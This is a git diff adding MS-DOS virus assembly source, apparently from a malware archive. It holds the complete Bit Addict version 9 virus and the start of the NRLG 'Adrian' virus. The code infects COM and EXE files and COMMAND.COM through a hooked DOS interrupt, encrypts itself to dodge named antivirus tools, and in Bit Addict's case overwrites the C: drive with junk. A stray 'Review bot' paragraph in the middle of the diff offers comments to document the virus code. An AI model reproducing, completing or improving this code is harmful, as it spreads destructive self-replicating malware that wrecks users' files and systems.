+ComHeader: ; dit stukje wordt voor een
+ mov ax,cs ; COM-file geplaatst, en is om
+ add ax,0100h ; het virus te starten.
+OldSize equ this word-2
+ push ax
+ mov ax,offset Begin
+ push ax
+ retf
+Dead equ $
+ dw 0DEADh ; signature, om te controleren
+ ; of een file al eens eerder
+ ; besmet is.
+
+Infect: push ax ; Infecteer een file
+ push bx
+ push cx
+ push si
+ push di
+ push bp
+ push es
+ mov ax,4300h ; lees attributen en bewaar
+ call DOS ; ze
+ jmpc @@83
+ push cx
+ push dx
+ push ds
+ test cx,1
+ jz @@71
+ mov ax,4301h ; set Read-Only attribuut
+ and cx,0fffeh ; op nul
+ call DOS
+ jmpc @@82
+@@71: mov ax,3d02h ; open de file
+ call DOS
+ jmpc @@82
+ mov bx,ax
+ mov ax,5700h ; lees de datum en tijd en
+ call DOS ; bewaar ze
+ jmpc @@81
+ push cx
+ push dx
+ push cs ; ds=es=cs
+ pop ds
+ push cs
+ pop es
+ mov ah,3fh ; lees de header van de file
+ mov cx,HeaderLength
+ mov dx,offset Header
+ call DOS
+ jmpc @@80
+ cmp ax,HeaderLength
+ jne @@75
+ cmp Signature,5a4dh ; Controleer of ID aanwezig is
+ jne @@72
+ cmp ExeID,0DEADh
+ jmp @@73
+@@72: cmp ComID,0DEADh
+@@73: jmpe @@80 ; als ID aanwezig is, stop dan
+@@74: cmp Signature,5a4dh
+ je @@77
+@@75: mov ax,4202h ; infecteer com-files
+ xor cx,cx ; ga naar het einde van de file
+ xor dx,dx
+ call DOS
+ mov cx,10h ; aanpassen van de com-header
+ div cx ; aan deze com-file
+ or dx,dx
+ je @@76
+ push ax
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop ax
+ jmpc @@80
+ inc ax
+@@76: add ax,10h
+ mov OldSize,ax
+ mov si,offset Header ; bewaar het eerste deel van
+ mov di,offset SavedCode ; het programma
+ mov cx,Dead-ComHeader+2
+ cld
+ rep movsb
+ mov ah,40h ; schrijf het virus achter het
+ mov cx,CodeSize ; programma
+ xor dx,dx
+ call DOS
+ jmpc @@80
+ mov ax,4200h ; ga naar het begin van de file
+ xor cx,cx
+ xor dx,dx
+ call DOS
+ jmpc @@80
+ mov ah,40h ; overschrijf het begin van het
+ mov cx,Dead-ComHeader+2 ; programma met de com-header
+ mov dx,offset ComHeader
+ call DOS
+ jmp @@80
+@@77: mov di,offset SavedCode ; infecteer exe-files
+ mov ax,5a4dh ; bewaar de oude waarden van
+ stosw ; cs:ip en ss:sp
+ mov ax,ExeIP
+ stosw
+ mov ax,ExeCS
+ stosw
+ mov ax,ExeSP
+ stosw
+ mov ax,ExeSS
+ stosw
+ mov ax,PartPage
+ stosw
+ mov ax,PageCount
+ stosw
+ mov ExeID,0DEADh ; Zet ID in exe-header
+ mov ax,4202h
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ mov cx,10h
+ div cx
+ or dx,dx
+ je @@78
+ push ax
+ push dx
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop dx
+ pop ax
+ jc @@80
+ inc ax
+@@78: sub ax,HeaderSize
+ mov ExeCS,ax
+ mov ExeIP,offset Begin
+ add ax,VirusSizePara
+ mov ExeSS,ax
+ mov ExeSP,200h
+ mov ax,MinMem
+ cmp ax,20h+VirusSizePara-CodeSizePara
+ jae @@79
+ mov ax,20h
+@@79: mov MinMem,ax
+ mov ah,40h ; schrijf het virus achter
+ mov cx,CodeSize ; de exe-file
+ xor dx,dx
+ call DOS
+ jc @@80
+ mov ax,4202h ; Pas de file-lengte in de
+ xor cx,cx ; header aan, als de file veel
+ xor dx,dx ; overlays bevat, dan zal de
+ call DOS ; exe-file niet meer werken,
+ mov cx,200h ; maar de file kan wel hersteld
+ div cx ; worden.
+ cmp dx,1
+ cmc
+ adc ax,0
+ mov PageCount,ax
+ mov PartPage,dx
+ mov ax,4200h
+ xor cx,cx
+ xor dx,dx ; ga naar het begin van de file
+ call DOS
+ jc @@80
+ mov ah,40h ; schrijf de nieuwe exe-header
+ mov cx,HeaderLength ; over de oude heen.
+ mov dx,offset Header
+ call DOS
+@@80: pop dx ; herstel de datum van de file
+ pop cx
+ mov ax,5701h
+ call DOS
+@@81: mov ah,3eh ; sluit de file
+ call DOS
+@@82: pop ds ; herstel de attributen van de
+ pop dx ; file
+ pop cx
+ test cx,1
+ jz @@83
+ mov ax,4301h
+ call DOS
+@@83: pop es ; herstel de waarden van de
+ pop bp ; registers en keer terug
+ pop di ; naar het oude interrupt 21
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ ret
+
+CodeEnd equ $
+
+Header dw HeaderLength/2 dup(0)
+ComCS equ Header[OldSize-Comheader] ; Com file
+ComID equ Header[Dead-ComHeader]
+
+Signature equ Header[0h] ; Exe file
+PartPage equ Header[2h]
+PageCount equ Header[4h]
+HeaderSize equ Header[8h]
+MinMem equ Header[0ah]
+MaxMem equ Header[0ch]
+ExeSS equ Header[0eh]
+ExeSP equ Header[10h]
+ExeID equ Header[12h]
+ExeIP equ Header[14h]
+ExeCS equ Header[16h]
+
+DosInt21 dd 0
+OldInt21 dd 0
+OldInt1 dd 0
+
+File1 dw 36 dup(0)
+File2 dw 36 dup(0)
+
+VirusEnd equ $
+
+cseg ends
+
+sseg segment stack
+ db 200h dup(1)
+sseg ends
+
+end Begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict9.asm b/MSDOS/Virus.MSDOS.Unknown.addict9.asm
new file mode 100644
index 00000000..9e711f60
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict9.asm
@@ -0,0 +1,743 @@ +; Bit Addict Versie 9 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +dfn macro Num1,Num2 + db Num1 + dw offset Num2 + endm + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ ; begin van het virus + +CodeSize equ CodeEnd-BeginCode ; de grootte van het +CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h ; virus achter een file + +VirusSize equ VirusEnd-BeginCode ; de grootte van het +VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h ; virus in het geheugen + +HeaderLength equ 18h ; grootte van een + +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het +OldCSIP equ this dword ; virus +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 +OldPartPage dw 0 +OldPageCount dw 0 + +Begin: push ax ; Programma om het virus + push ds ; resident te laten blijven + push es ; en om de comspec te + call Init ; infecteren + jnc @@12 + call BiosCheck ; Als bit addict op een andere + push cs ; computer draait wordt er een + pop es ; teller 
verhoogt. + xor al,al + mov cx,VirusSize-CodeSize ; zet alle variabelen op nul + mov di,CodeSize + cld + rep stosb ; debug interrupt 21h om het + call DebugOn ; orginele interrupt te vinden + pop es + push es + mov ah,4ah ; en reserveer geheugen voor + mov bx,-1 ; bit addict. + call DOS + push bx + call DebugOff + pop bx + mov ax,cs + pop dx + push dx + sub ax,dx + add ax,cs:MinMem + add ax,CodeSizePara+VirusSizePara+1 + cmp bx,ax + jb @@12 + mov ah,4ah + sub bx,VirusSizePara+1 + int 21h + jb @@12 + mov ah,48h + mov bx,VirusSizePara + int 21h + jb @@12 + mov es,ax + dec ax + mov ds,ax + mov word ptr ds:[1],8 + call CopyBitAddict ; Copieer bit addict naar + pop es ; het gereserveerde geheugen + push es ; Infecteer bestand in de + call InfectComspec ; comspec +@@12: pop es + pop ds ; ga nu verder met het + pop ax ; programma voor Bit Addict + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden + +ID dw 0DEADh ; hier wordt het virus herkend + ; als het in het geheugen staat + +Count dw 0 ; In deze variabele staat op + ; hoeveel verschillende + ; computers het virus is + ; geweest +Bios db 10h dup(0) ; Gegevens over de bios, + ; door dit te vergelijken met + ; de bios kan het virus weten + ; of het virus op een andere + ; computer draait + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + xor si,si + xor di,di + mov cx,VirusSize + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 ; is dit de laatste variabele ? 
+ jne @@30 + jmp short @@33 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter, + cmp byte ptr ds:[di+9],':' ; maar doe dit alleen wanneer + jne @@32 ; de comspec naar de c of de + mov al,ds:[di+8] ; d-drive wijst. + and al,0dfh + cmp al,'C' + je @@32 + cmp al,'D' + jne @@33 +@@32: lea dx,[di+8] + push cs:OldIP ; bewaar alle variabelen die + push cs:OldCS ; we nog nodig hebben. + push cs:OldSP + push cs:OldSS + call Infect ; infecteren + pop cs:OldSS ; herstel alle variabelen die + pop cs:OldSP ; we nog nodig hebben + pop cs:OldCS + pop cs:OldIP +@@33: ret + +DebugOn:push ax ; deze procedere is om de + push ds ; trap-flag te zetten, en + xor ax,ax ; interrupt 1 te initialiseren + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + pushf + pop ax + or ah,1 + push ax + popf + sti + pop ds + pop ax + ret + +DebugOff: ; deze procedure zet de + push ax ; trap-flag weer op nul en + push ds ; herstelt interrupt 1. 
+ cli + pushf + pop ax + and ah,0feh + push ax + popf + xor ax,ax + mov ds,ax + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp short @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + mov ax,word ptr ds:ID ; vergelijk identificatie + cmp ax,word ptr cs:ID + je @@52 + stc +@@52: ret + +BiosCheck: ; deze procedure vergelijkt + mov ax,0ffffh ; de bios, met de gegevens + mov ds,ax ; over de bios in het virus, + push cs ; zijn deze niet gelijk, dan + pop es ; zal het virus op een andere + xor si,si ; computer draaien, en wordt + mov di,offset Bios ; er een teller verhoogt, komt + mov cx,10h ; deze teller boven de 255 dan + cld ; zal het bit-addict virus + repe cmpsb ; actief worden. + je @@54 + mov ax,cs:Count + inc ax + cmp ax,100h + jb @@53 + call BitAddict +@@53: mov cs:Count,ax + xor si,si + mov di,offset Bios + mov cx,10h + rep movsb +@@54: ret + +BitAddict: ; in deze procedure wordt + xor dx,dx ; de c-drive overscreven met +@@55: push dx ; onzin, dit mag verandert + mov ax,3 ; worden, om het virus iets + xor bx,bx ; anders te laten doen, een + mov cx,40h ; muziekje spelen, of met het + int 26h ; toetsenbord spelen + pop ax ; bijvoorbeeld. 
+ pop dx + add dx,40h + or dx,dx + jne @@55 + ret + +NewInt1:push bp ; deze procedure wordt + mov bp,sp ; gebruikt bij het debuggen + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax ; roept interrupt 21h aan. + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +Functions: ; dit is een tabel met alle + dfn 3ch,Open ; dos-functies die door + dfn 3dh,Open ; bit-addict verandert worden + dfn 3eh,Close + dfn 3fh,Read + dfn 40h,Write + dfn 4bh,Exec + +NewInt21: ; Het nieuwe interrupt 21h + pushf + push bx + push bp + mov bp,sp + mov bx,offset Functions +@@63: cmp ah,cs:[bx] + je @@68 + add bx,3 + cmp bx,offset NewInt21 + jne @@63 + pop bp + pop bx +EOI: popf + jmp cs:OldInt21 +@@68: mov bx,cs:[bx+1] + xchg bx,ss:[bp+2] + pop bp + ret + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +Exec: cmp al,40h + je InstallCheck + call CheckExtension ; functie 4bh, infecteer eerst + jc EOI ; met Bit Addict + popf + push dx + push ds + pushf + call cs:OldInt21 + pop ds + pop dx + pushf + call Infect + popf + retf 2 + +Open: call CheckExtension ; fn 3ch en 3dh + jc EOI + call cs:OldInt21 + jc @@92 + pushf + push ax + push cx + push si + push di + push es + push cs + pop es + mov si,dx + mov di,offset File1 + cmp word ptr es:[di],0 + je @@90 + mov di,offset File2 + cmp word ptr es:[di],0 + jne @@91 +@@90: cld + stosw + mov cx,70 + rep movsb +@@91: pop es + pop di + pop si + pop cx + pop ax + popf +@@92: retf 2 + +Close: cmp bx,cs:File1 ; fn 3eh + je @@93 + cmp bx,cs:File2 + jne EOI + call cs:OldInt21 + push si + mov si,offset File2 + jmp short @@94 
+@@93: call cs:OldInt21 + push si + mov si,offset File1 +@@94: jc @@95 + pushf + push dx + push ds + push cs + pop ds + lea dx,[si+2] + call Infect + pop ds + pop dx + popf +@@95: mov word ptr cs:[si],0 + pop si + retf 2 + +Read: jmp EOI ; fn 3fh + +Write: jmp EOI ; fn 40h + +CheckExtension: ; controleer of de extensie + push ax ; wel exe of com is + push cx + push si + push di + push es + push ds + pop es + mov di,dx ; zoek het einde van de + xor al,al ; file-naam + mov cx,70 + cld + repne scasb + jne @@65 + std + mov al,'.' ; zoek de laatste punt + neg cx + add cx,70 + std + repne scasb + jne @@65 + lea si,[di+2] + cld + lodsw ; eerste 2 letters + and ax,0dfdfh ; maak hoofdletters + cmp ax,5845h ; 'EX' + je @@64 + cmp ax,4f43h ; 'CO' + jne @@65 + lodsb ; 3e letter + and al,0dfh + cmp al,4dh ; 'M' + je @@66 + jmp short @@65 +@@64: lodsb ; 3e letter + and al,0dfh + cmp al,45h ; 'E' + je @@66 +@@65: stc + jmp short @@67 +@@66: clc +@@67: pop es + pop di + pop si + pop cx + pop ax + ret + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst, en is om + add ax,0100h ; het virus te starten. +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf +Dead equ $ + dw 0DEADh ; signature, om te controleren + ; of een file al eens eerder + ; besmet is. 
+ +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@83 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@82 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@82 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@81 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + mov dx,offset Header + call DOS + jmpc @@80 + cmp ax,HeaderLength + jne @@75 + cmp Signature,5a4dh ; Controleer of ID aanwezig is + jne @@72 + cmp ExeID,0DEADh + jmp @@73 +@@72: cmp ComID,0DEADh +@@73: jmpe @@80 ; als ID aanwezig is, stop dan +@@74: cmp Signature,5a4dh + je @@77 +@@75: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + call DOS + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@76 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop ax + jmpc @@80 + inc ax +@@76: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize ; programma + xor dx,dx + call DOS + jmpc @@80 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + call DOS + jmpc @@80 + mov ah,40h ; overschrijf het begin van het + mov cx,Dead-ComHeader+2 ; programma met de com-header + mov dx,offset ComHeader + call DOS + jmp @@80 +@@77: mov di,offset SavedCode ; infecteer exe-files + mov ax,5a4dh ; bewaar de oude waarden van + stosw ; cs:ip en ss:sp + mov ax,ExeIP + stosw + mov ax,ExeCS + stosw + mov ax,ExeSP + stosw + mov ax,ExeSS + stosw + mov ax,PartPage + stosw + mov ax,PageCount + stosw + mov ExeID,0DEADh ; Zet ID in 
exe-header + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov cx,10h + div cx + or dx,dx + je @@78 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop dx + pop ax + jc @@80 + inc ax +@@78: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,VirusSizePara + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+VirusSizePara-CodeSizePara + jae @@79 + mov ax,20h +@@79: mov MinMem,ax + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize ; de exe-file + xor dx,dx + call DOS + jc @@80 + mov ax,4202h ; Pas de file-lengte in de + xor cx,cx ; header aan, als de file veel + xor dx,dx ; overlays bevat, dan zal de + call DOS ; exe-file niet meer werken, + mov cx,200h ; maar de file kan wel hersteld + div cx ; worden. + cmp dx,1 + cmc + adc ax,0 + mov PageCount,ax + mov PartPage,dx + mov ax,4200h + xor cx,cx + xor dx,dx ; ga naar het begin van de file + call DOS + jc @@80 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. 
+ mov dx,offset Header + call DOS +@@80: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + call DOS +@@81: mov ah,3eh ; sluit de file + call DOS +@@82: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@83 + mov ax,4301h + call DOS +@@83: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeEnd equ $ + +Header dw HeaderLength/2 dup(0) +ComCS equ Header[OldSize-Comheader] ; Com file +ComID equ Header[Dead-ComHeader] + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ExeID equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] + +DosInt21 dd 0 +OldInt21 dd 0 +OldInt1 dd 0 + +File1 dw 36 dup(0) +File2 dw 36 dup(0) + +VirusEnd equ $ + +cseg ends + +sseg segment stack + db 200h dup(1) +sseg ends + +end Begin +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.adrian.asm b/MSDOS/Virus.MSDOS.Unknown.adrian.asm new file mode 100644 index 00000000..8ee02f74 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.adrian.asm 
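Review bot: The comment on `HeaderLength equ 18h` is cut off mid-sentence (`; grootte van een`), so the constant that sizes the `Header` buffer and the 3Fh read in `Infect` is left undocumented. The equates `Signature` through `ExeCS` address offsets 0h–16h of that buffer, so the value is the 24-byte prefix of the EXE header the routine reads and later writes back; I'd complete it as `HeaderLength equ 18h ; size of the EXE-header prefix read into Header (18h bytes)`. The `Functions` table also lists 3Fh and 40h, but `Read` and `Write` are bare `jmp EOI`; a one-line comment such as `; no-op: passes straight to the saved INT 21h` on each would save an analyst from searching for handler bodies that do not exist.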
@@ -0,0 +1,474 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +not byte ptr [di] +not byte ptr [di] +inc word ptr [di] +sub word ptr [di],09553h +add word ptr [di],0463h +inc word ptr [di] +add byte ptr [di],0c7h +sub word ptr [di],096b1h +inc word ptr [di] +inc byte ptr [di] +sub word ptr [di],06236h +sub word ptr [di],04fb9h +xor word ptr [di],0eaa0h +xor word ptr [di],02ff5h +inc byte ptr [di] +not byte ptr [di] +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! 
+ ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! 
put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db 'Adrian by NRLG' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
